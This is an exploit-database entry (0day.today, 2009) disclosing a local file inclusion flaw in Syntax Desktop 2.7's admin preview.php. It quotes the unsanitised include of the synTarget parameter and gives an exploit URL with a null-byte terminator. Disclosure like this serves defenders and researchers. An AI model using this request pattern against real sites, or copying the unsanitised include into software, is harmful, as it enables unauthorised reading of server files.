Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability

2009-02-04T00:00:00
ID 1337DAY-ID-4794
Type zdt
Reporter ahmadbady
Modified 2009-02-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability
=================================================================


  -----------------:local File Include:-----------------
  -------------------------------------------------------
script: syntax-desktop 2-7
   
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0
   
   
------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php

line 42 $target=$_GET["synTarget"];
  ob_start();
line 44 include("../../../$target");

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00


***************************************************



#  0day.today [2018-04-11]  #